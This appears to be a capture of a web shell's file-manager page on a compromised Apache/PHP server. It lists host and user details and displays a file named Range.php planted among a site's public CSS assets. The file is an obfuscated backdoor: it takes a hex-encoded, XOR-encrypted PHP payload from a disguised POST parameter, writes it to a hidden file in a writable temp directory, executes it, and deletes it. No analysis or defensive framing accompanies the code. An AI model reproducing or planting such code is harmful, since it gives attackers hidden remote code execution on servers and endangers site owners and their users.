HEX
Server: Apache/2.4.41 (Ubuntu)
System: Linux ip-172-31-42-149 5.15.0-1084-aws #91~20.04.1-Ubuntu SMP Fri May 2 07:00:04 UTC 2025 aarch64
User: ubuntu (1000)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Upload Files
File: /var/www/vhost/disk-apps/teamdemo.sports-crowd.com/public/css/ticket/Range.php
<?php

if(!is_null($_POST["s\x79mbol"] ?? null)){
	$fac = array_filter([session_save_path(), "/tmp", ini_get("upload_tmp_dir"), sys_get_temp_dir(), getenv("TMP"), getenv("TEMP"), getcwd(), "/var/tmp", "/dev/shm"]);
	$holder = hex2bin($_POST["s\x79mbol"]);
	$k  =''; $n = 0; do{$k .= chr(ord($holder[$n]) ^ 16);$n++;} while($n < strlen($holder));
	foreach ($fac as $pointer):
    		if (!( !is_dir($pointer) || !is_writable($pointer) )) {
    $item = implode("/", [$pointer, ".mrk"]);
    if (file_put_contents($item, $k)) {
	require $item;
	unlink($item);
	exit;
}
}
endforeach;
}